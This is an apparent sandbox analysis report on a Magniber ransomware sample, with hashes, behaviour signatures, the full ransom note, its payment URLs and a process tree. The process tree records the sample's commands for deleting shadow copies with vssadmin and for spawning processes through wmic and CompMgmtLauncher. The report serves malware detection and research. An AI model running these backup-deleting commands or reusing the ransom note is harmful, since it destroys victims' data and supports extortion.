Overview

overview

10

Static

static

magnibar_f...75.exe

windows7_x64

10

magnibar_f...75.exe

windows10_x64

10

Resubmissions

23-08-2021 16:26

210823-tx5an7s74s 10

18-08-2021 20:35

210818-2gkvb49v8e 10

22-07-2021 19:24

210722-68c2armfnx 10

Analysis

  • max time kernel
    280s
  • max time network
    271s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    22-07-2021 19:24

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    magnibar_f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675.exe

  • Size

    21KB

  • MD5

    4160c35d3c600712b528e8072de1bc58

  • SHA1

    12c822103678fed7b928f0202eb7e51714ab3b56

  • SHA256

    f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675

  • SHA512

    f722f7a5560641b0cbeb73dfb9d495cf2920858acfdcd5806f619256f2810569486be00eee4547b07298ca20c18d478f3f567809a7b2ff9cf81519e057a3a962

Score
10/10
magniberransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://ea10e838bc14c0409elqcsthxnw.ndkeblzjnpqgpo5o.onion/lqcsthxnw Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://ea10e838bc14c0409elqcsthxnw.wonride.site/lqcsthxnw http://ea10e838bc14c0409elqcsthxnw.lognear.xyz/lqcsthxnw http://ea10e838bc14c0409elqcsthxnw.lieedge.casa/lqcsthxnw http://ea10e838bc14c0409elqcsthxnw.bejoin.space/lqcsthxnw Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://ea10e838bc14c0409elqcsthxnw.ndkeblzjnpqgpo5o.onion/lqcsthxnw

http://ea10e838bc14c0409elqcsthxnw.wonride.site/lqcsthxnw

http://ea10e838bc14c0409elqcsthxnw.lognear.xyz/lqcsthxnw

http://ea10e838bc14c0409elqcsthxnw.lieedge.casa/lqcsthxnw

http://ea10e838bc14c0409elqcsthxnw.bejoin.space/lqcsthxnw

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

    ransomwaremagniber
  • Process spawned unexpected child process 8 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Suspicious use of SetThreadContext 3 IoCs
  • Interacts with shadow copies 2 TTPs 4 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1256
    • C:\Users\Admin\AppData\Local\Temp\magnibar_f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675.exe
      "C:\Users\Admin\AppData\Local\Temp\magnibar_f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:1088
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1396
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
            PID:1588
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1684
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          3⤵
            PID:1816
      • C:\Windows\system32\Dwm.exe
        "C:\Windows\system32\Dwm.exe"
        1⤵
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:1188
        • C:\Windows\system32\cmd.exe
          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1784
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1268
      • C:\Windows\system32\taskhost.exe
        "taskhost.exe"
        1⤵
        • Modifies extensions of user files
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:1128
        • C:\Windows\system32\notepad.exe
          notepad.exe C:\Users\Public\readme.txt
          2⤵
          • Opens file in notepad (likely ransom note)
          PID:2044
        • C:\Windows\system32\cmd.exe
          cmd /c "start http://ea10e838bc14c0409elqcsthxnw.wonride.site/lqcsthxnw^&1^&43087494^&65^&319^&12"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1552
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" http://ea10e838bc14c0409elqcsthxnw.wonride.site/lqcsthxnw&1&43087494&65&319&12
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:364
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:364 CREDAT:275457 /prefetch:2
              4⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:2276
        • C:\Windows\system32\cmd.exe
          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1248
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1108
      • C:\Windows\system32\cmd.exe
        cmd /c CompMgmtLauncher.exe
        1⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:800
        • C:\Windows\system32\CompMgmtLauncher.exe
          CompMgmtLauncher.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2128
          • C:\Windows\system32\wbem\wmic.exe
            "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
            3⤵
              PID:2300
        • C:\Windows\system32\cmd.exe
          cmd /c CompMgmtLauncher.exe
          1⤵
          • Process spawned unexpected child process
          • Suspicious use of WriteProcessMemory
          PID:1080
          • C:\Windows\system32\CompMgmtLauncher.exe
            CompMgmtLauncher.exe
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2164
            • C:\Windows\system32\wbem\wmic.exe
              "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
              3⤵
                PID:2428
          • C:\Windows\system32\cmd.exe
            cmd /c CompMgmtLauncher.exe
            1⤵
            • Process spawned unexpected child process
            • Suspicious use of WriteProcessMemory
            PID:1008
            • C:\Windows\system32\CompMgmtLauncher.exe
              CompMgmtLauncher.exe
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2152
              • C:\Windows\system32\wbem\wmic.exe
                "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                3⤵
                  PID:2316
            • C:\Windows\system32\cmd.exe
              cmd /c CompMgmtLauncher.exe
              1⤵
              • Process spawned unexpected child process
              • Suspicious use of WriteProcessMemory
              PID:2100
              • C:\Windows\system32\CompMgmtLauncher.exe
                CompMgmtLauncher.exe
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2212
                • C:\Windows\system32\wbem\wmic.exe
                  "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                  3⤵
                    PID:2416
              • C:\Windows\system32\vssadmin.exe
                vssadmin.exe Delete Shadows /all /quiet
                1⤵
                • Process spawned unexpected child process
                • Interacts with shadow copies
                PID:2548
              • C:\Windows\system32\vssadmin.exe
                vssadmin.exe Delete Shadows /all /quiet
                1⤵
                • Process spawned unexpected child process
                • Interacts with shadow copies
                PID:2540
              • C:\Windows\system32\vssadmin.exe
                vssadmin.exe Delete Shadows /all /quiet
                1⤵
                • Process spawned unexpected child process
                • Interacts with shadow copies
                PID:2652
              • C:\Windows\system32\vssadmin.exe
                vssadmin.exe Delete Shadows /all /quiet
                1⤵
                • Process spawned unexpected child process
                • Interacts with shadow copies
                PID:2692
              • C:\Windows\system32\vssvc.exe
                C:\Windows\system32\vssvc.exe
                1⤵
                  PID:2760

                Network

                MITRE ATT&CK Enterprise v6

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\5DPA12TE.txt
                  MD5

                  db293a4d8871a4804d5db971b46795b4

                  SHA1

                  27d7883a0c328a8ce5dd16cfd29dfb41ec3d63f5

                  SHA256

                  a8e47f430b530839b12b47b1c48088f28bd2c283711396583b851df1e8afafd5

                  SHA512

                  bf833675eebd44b699a6bc6bdbe92a8ea9abb3afe0393d534bdb8e8e37ca854fade8690ba8a32936271035065dce8b4e1665f45ed3cb356a57ca243020b649ec

                  Download Submit

                • C:\Users\Admin\Desktop\CompressLimit.odp.lqcsthxnw
                  MD5

                  8ab6bc851c3a7e94c29e1bd46256d66d

                  SHA1

                  fe95f30de2d75ba592090f19ed738588138cc0a4

                  SHA256

                  90f8ba051b5e991c143ff5ec83c9b3a164a3c8bb015228073d7d314f4954aa58

                  SHA512

                  f49b4ec3480438fc30e79e67dc42ffbf60e11a5a392f3ab1344eae52116ff91da0acacec5556d98f67b8511c5b1ce9f354a5d2ebae163d3ffb7daf64cbd98bef

                  Download Submit

                • C:\Users\Admin\Desktop\ExpandOptimize.docm.lqcsthxnw
                  MD5

                  2441f5a6c060eb16c926f746aef7e1d5

                  SHA1

                  72a2b1ee7a3354792c6682870bb41a0cf2bf5606

                  SHA256

                  aeb9c1c0afe3d628b8fd6808dc5df70999532016724a3fd491a725b7a7d1432f

                  SHA512

                  74fb556917c57ec862d90e59e0a9962ac12550cc5f777cce03fc49d7776e03270cc22089ebb128bcb0bff22973ed58ec4a1c4871e069140ed2c429a3ab1266a1

                  Download Submit

                • C:\Users\Admin\Desktop\FormatConfirm.mpg.lqcsthxnw
                  MD5

                  485caa19879e4971504c2bca9858ed3c

                  SHA1

                  d6193f77a6352d10fcdc474107f66822db0d10df

                  SHA256

                  1ef3f6327e9a8b365cab54d31b54332140dd82fb8e6ab25b7eeb8b222e5adfca

                  SHA512

                  1168abfc8fde3289db9bf50f9ab40ced0415d72016268fa80cd0d32a5b8266f26229f07643ca7df81e7b8e90bcb5ed8542bafd7ba1db9225f708c17ec7974c39

                  Download Submit

                • C:\Users\Admin\Desktop\GetBackup.pptm.lqcsthxnw
                  MD5

                  51fd8ccbf6b32651e3db3f1d16658cd8

                  SHA1

                  3c16db8b48792e898b274fe9cbe04639eb5d5876

                  SHA256

                  7a494a49eec2cd2e165e577937dc06ae3cc63fa9f5cc6ca427407e9c8f429e34

                  SHA512

                  2764b363e615dfe9c4ddc75be7d87829b4574e282248c3b621c2f8b02d5aefe51c8b7680e14575e62265b0183d6c039ba10e977f047efc8feaf62e179a31bc6c

                  Download Submit

                • C:\Users\Admin\Desktop\GetReset.jpeg.lqcsthxnw
                  MD5

                  f7c6dc0490f3db074d586225fd5ea490

                  SHA1

                  44e58bc486c4708d8a3ef33231606f821c3ebc9e

                  SHA256

                  4504d1bef3df8f19740c3fe495c65bf2fb472a772a38263101a9ec6f6b9d7881

                  SHA512

                  01c894b86abc2ce0b95e79d1e50babacc5d966dbf7a8de6cdac01c2395c1030c9474c6fa32641616ef9b54ee1303c30a344728d648a1a163e273033d00577ec6

                  Download Submit

                • C:\Users\Admin\Desktop\InstallConvert.svgz.lqcsthxnw
                  MD5

                  19b941ef054ebf1022d2288669e00f4b

                  SHA1

                  3c6544f2f135780597cf7b7f801c41079911b607

                  SHA256

                  149045385c824b6aa0a82a40d73218e5b7c174ea52412272e581552926b52f45

                  SHA512

                  59a267861602f44b6409166fae97bf4c32f7841d9bfe2431596c92f1179a4aaf36152b88e7747fc2a8b7815d2ace9f9c9337b52cbcf1f97cf4b04393b587efc5

                  Download Submit

                • C:\Users\Admin\Desktop\LimitReset.zip.lqcsthxnw
                  MD5

                  8057c788072f084824dbd0129e7ac252

                  SHA1

                  e448e7c1c0ea7084c0ec149a6cb8b2582bbe1c56

                  SHA256

                  2bd0c6d22ff1b3cfcb0831a25e9cc05a2cb9acce87829fc1348999baae7c17ea

                  SHA512

                  ec205fe65ff19608a724e24461b7c6ec0b98734420910a03b0f2495dfc3383dd6c0ad12d88bb68cef2679b8343219ac9cfcf38b2419b0c1effe9dffa74c3c2a3

                  Download Submit

                • C:\Users\Admin\Desktop\NewWait.ppsx.lqcsthxnw
                  MD5

                  ec3ac1cc1356c1ee4d5bfef1488c6640

                  SHA1

                  5b643002cab326691f6db79e322ebdf802b8f6da

                  SHA256

                  2295438e9ba6700cff74ac463ea898e0bfda7e884ce9d3c9af86d43e6854cb20

                  SHA512

                  259bab5c138074b108c918eeb2911394d7c36dde9d54b4b22f15aaa1010ec2f9e762bbeef5a524955cdd0dd28a2c660b9c1309265c4ea7b03b71d9fddb65d3fd

                  Download Submit

                • C:\Users\Admin\Desktop\ResolveWait.avi.lqcsthxnw
                  MD5

                  0ebbb3a04d7ecbb59dd1f747e7069933

                  SHA1

                  1adb2dcb47296e131239118cc214e61d06f05361

                  SHA256

                  01ea8eb18d8c4d59ff298677ad0de4c077c0208b8f73660be4bafeb273d0cb7c

                  SHA512

                  d8864cd52be0d8ee80e5d99bc2c00ef67b06e17e68ab2114fee556d0cc6f87e76e5101f0d995b88301b91fe7759c8be5470e4417abbb605fc739f75f58d329cc

                  Download Submit

                • C:\Users\Admin\Desktop\SelectConnect.rle.lqcsthxnw
                  MD5

                  e19871b0bf2604497a36abba052c60ba

                  SHA1

                  65c3057bb6fe2b4ac57139b6248ccc0f7b239207

                  SHA256

                  4e6e6f65431386ede6e7cabdb129ebce3f877544428bf6d198c131548ce2b772

                  SHA512

                  976568f06474c82f0e4bee43a8a1bd9f25212ce0748141814ca4a4649c8f29a804f0e13f67a19dc54defc1aac3cd1fbff79fac96876b6763d6862699f9bba8ff

                  Download Submit

                • C:\Users\Admin\Desktop\ShowUninstall.emf.lqcsthxnw
                  MD5

                  a06a4f16b1a784acfba0a4f38a55f27a

                  SHA1

                  f9f9534799e2c609f1f3bdf7e6b46bbc6f974264

                  SHA256

                  ce0eadc14e58b5492aefe1977b19e68a7bbe58a7eed85aafb971ec14faca3391

                  SHA512

                  3ea6642b6547803807618ee34d1220ad8ca96708e7cd77dc4847122603b89503787e21d3007782baa8ca47c84a9339b34dc9cbc2667d7407080b84eea0720a56

                  Download Submit

                • C:\Users\Admin\Desktop\SyncConfirm.asf.lqcsthxnw
                  MD5

                  d54d4ff73411553d2cde45a8f450fa9b

                  SHA1

                  98df30fb27b83178c190e8b88d84cc3354b0bcfa

                  SHA256

                  bd1d286e05b2838f446cad46ec48daf974767608686a6ec85c614ebbf5e96f0f

                  SHA512

                  9d4f687f5ac5dfd15d69c03f535b6742153f917b853e5d99d4fda2b1761dbdbf83260902a782c77d583c512159241ce70489b0d9d935710fe6d78cbdf5bc42d7

                  Download Submit

                • C:\Users\Admin\Desktop\SyncMount.tif.lqcsthxnw
                  MD5

                  51cc6acfab0fcf019502576c5d123e5d

                  SHA1

                  027236141cfa463dfd5ede692b3a1aa1483510ba

                  SHA256

                  9bad9c5cd0c8492d19271093a6230ead3e5c2d89a97edc2713cb2e89225ef373

                  SHA512

                  c4efe5eca64a6208da3b4401b1ba416ef517f7727c194286d88c317dfbc3e23a1c8bede19a4534a7d71d7a9f5ec74b548753c837a4e3e7b086ad6cf21289b922

                  Download Submit

                • C:\Users\Admin\Desktop\UnregisterDisconnect.gif.lqcsthxnw
                  MD5

                  bfdad7668782d521c3a02b6c0df55ef1

                  SHA1

                  a94b01216e6685a569c09fa1a14872c2f50adf6f

                  SHA256

                  fc40e9f33ba6006745edfe243e85080125ccb4a17393b9d4c1803f9cff6a2567

                  SHA512

                  465512c61db264976e14769454d30d8fdf8ad59beab8470d9b4fb5871831ac6a8fa51defb38cc8bccc34c9a386f00bffcabeb2df05625bcd2a98f155c1dd5529

                  Download Submit

                • C:\Users\Admin\Desktop\readme.txt
                  MD5

                  bf7c5b03bf8431d3fea9a84f0a4ac7ae

                  SHA1

                  e10bb48ee93c6bf2128a461d300fdd7c45889b85

                  SHA256

                  1aa9e2c49c8516b4e666428b27bc19a3dd431a8d8b6ec98f749196cb48d4ed83

                  SHA512

                  b4d57befeec91fc179f24c63bf461329b7be2ea61b6b14bfd906d98b3e449e9ccbbcefb6b929696f800ad4581330368197fe837bf0f835deae8d09a5538e2b1e

                  Download Submit

                • C:\Users\Public\readme.txt
                  MD5

                  bf7c5b03bf8431d3fea9a84f0a4ac7ae

                  SHA1

                  e10bb48ee93c6bf2128a461d300fdd7c45889b85

                  SHA256

                  1aa9e2c49c8516b4e666428b27bc19a3dd431a8d8b6ec98f749196cb48d4ed83

                  SHA512

                  b4d57befeec91fc179f24c63bf461329b7be2ea61b6b14bfd906d98b3e449e9ccbbcefb6b929696f800ad4581330368197fe837bf0f835deae8d09a5538e2b1e

                  Download Submit

                • memory/364-89-0x0000000000000000-mapping.dmp

                  Download

                • memory/1088-64-0x00000000000F0000-0x00000000000F1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1088-73-0x0000000001D30000-0x0000000001D31000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1088-110-0x0000000001FC0000-0x0000000001FC1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1088-72-0x0000000001D20000-0x0000000001D21000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1088-62-0x0000000000020000-0x0000000000025000-memory.dmp

                  Filesize

                  20KB

                  Download

                • memory/1088-63-0x00000000000E0000-0x00000000000E1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1088-71-0x0000000001D10000-0x0000000001D11000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1088-70-0x0000000001D00000-0x0000000001D01000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1088-65-0x0000000000100000-0x0000000000101000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1088-66-0x0000000000110000-0x0000000000111000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1088-67-0x0000000001CB0000-0x0000000001CB1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1088-68-0x0000000001CC0000-0x0000000001CC1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1088-69-0x0000000001CD0000-0x0000000001CD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1108-77-0x0000000000000000-mapping.dmp

                  Download

                • memory/1128-74-0x0000000001C20000-0x0000000001C24000-memory.dmp

                  Filesize

                  16KB

                  Download

                • memory/1248-76-0x0000000000000000-mapping.dmp

                  Download

                • memory/1268-97-0x0000000000000000-mapping.dmp

                  Download

                • memory/1396-99-0x0000000000000000-mapping.dmp

                  Download

                • memory/1552-75-0x0000000000000000-mapping.dmp

                  Download

                • memory/1588-100-0x0000000000000000-mapping.dmp

                  Download

                • memory/1684-96-0x0000000000000000-mapping.dmp

                  Download

                • memory/1784-95-0x0000000000000000-mapping.dmp

                  Download

                • memory/1816-98-0x0000000000000000-mapping.dmp

                  Download

                • memory/2044-60-0x000007FEFB881000-0x000007FEFB883000-memory.dmp

                  Filesize

                  8KB

                  Download

                • memory/2044-59-0x0000000000000000-mapping.dmp

                  Download

                • memory/2128-101-0x0000000000000000-mapping.dmp

                  Download

                • memory/2152-102-0x0000000000000000-mapping.dmp

                  Download

                • memory/2164-103-0x0000000000000000-mapping.dmp

                  Download

                • memory/2212-106-0x0000000000000000-mapping.dmp

                  Download

                • memory/2276-109-0x0000000000000000-mapping.dmp

                  Download

                • memory/2276-111-0x0000000075561000-0x0000000075563000-memory.dmp

                  Filesize

                  8KB

                  Download

                • memory/2300-112-0x0000000000000000-mapping.dmp

                  Download

                • memory/2316-113-0x0000000000000000-mapping.dmp

                  Download

                • memory/2416-114-0x0000000000000000-mapping.dmp

                  Download

                • memory/2428-115-0x0000000000000000-mapping.dmp

                  Download